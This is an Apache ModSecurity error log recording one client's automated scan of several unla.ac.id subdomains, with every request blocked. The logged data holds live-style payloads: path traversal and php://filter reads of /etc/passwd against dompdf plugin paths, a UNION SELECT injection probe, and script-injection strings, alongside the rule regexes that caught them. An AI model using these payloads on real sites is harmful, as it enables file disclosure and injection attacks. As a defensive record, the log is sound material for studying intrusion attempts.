[Tue Aug 29 11:53:31.705350 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAoPucEAAAAM"]
[Tue Aug 29 11:53:32.560456 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15zMCo-f0AAAoLfUsAAAAG"]
[Tue Aug 29 11:53:33.566353 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15zcCo-f0AAAoesPgAAAAV"]
[Tue Aug 29 11:53:33.583577 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15zcCo-f0AAAo2m4cAAAAA"]
[Tue Aug 29 11:53:33.647490 2023] [:error] [pid 2615] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zcCo-f0AAAo3IewAAAAa"]
[Tue Aug 29 11:53:33.677922 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15zcCo-f0AAAoLfU4AAAAG"]
[Tue Aug 29 11:53:33.889318 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zcCo-f0AAAoesPkAAAAV"]
[Tue Aug 29 11:53:33.890760 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zcCo-f0AAAoW7RkAAAAJ"]
[Tue Aug 29 11:53:33.999357 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zcCo-f0AAAo2m4kAAAAA"]
[Tue Aug 29 11:53:34.121416 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15zsCo-f0AAAoUJcAAAAAB"]
[Tue Aug 29 11:53:34.142069 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zsCo-f0AAAoW7RsAAAAJ"]
[Tue Aug 29 11:53:34.751874 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15zsCo-f0AAAn407gAAAAW"]
[Tue Aug 29 11:53:35.091021 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15z8Co-f0AAAot8RgAAAAn"]
[Tue Aug 29 11:53:35.098723 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15z8Co-f0AAAoz73MAAAAS"]
[Tue Aug 29 11:53:35.306255 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15z8Co-f0AAAoUJcIAAAAB"]
[Tue Aug 29 11:53:35.329781 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15z8Co-f0AAAot8RoAAAAn"]
[Tue Aug 29 11:53:35.747492 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAo2m48AAAAA"]
[Tue Aug 29 11:53:35.774040 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15z8Co-f0AAAoT7ZwAAAAD"]
[Tue Aug 29 11:53:35.871356 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAoXJzIAAAAP"]
[Tue Aug 29 11:53:35.901513 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAowNrQAAAAH"]
[Tue Aug 29 11:53:35.916148 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAoXJzMAAAAP"]
[Tue Aug 29 11:53:35.988660 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAni-F4AAAAU"]
[Tue Aug 29 11:53:37.324297 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO150cCo-f0AAAn408IAAAAW"]
[Tue Aug 29 11:53:37.327679 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAot8SEAAAAn"]
[Tue Aug 29 11:53:37.332241 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAoT7aIAAAAD"]
[Tue Aug 29 11:53:37.451803 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAoz73wAAAAS"]
[Tue Aug 29 11:53:37.457985 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO150cCo-f0AAAofm9MAAAAX"]
[Tue Aug 29 11:53:37.467391 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAn408QAAAAW"]
[Tue Aug 29 11:53:37.781928 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAoesQQAAAAV"]
[Tue Aug 29 11:53:38.623575 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] 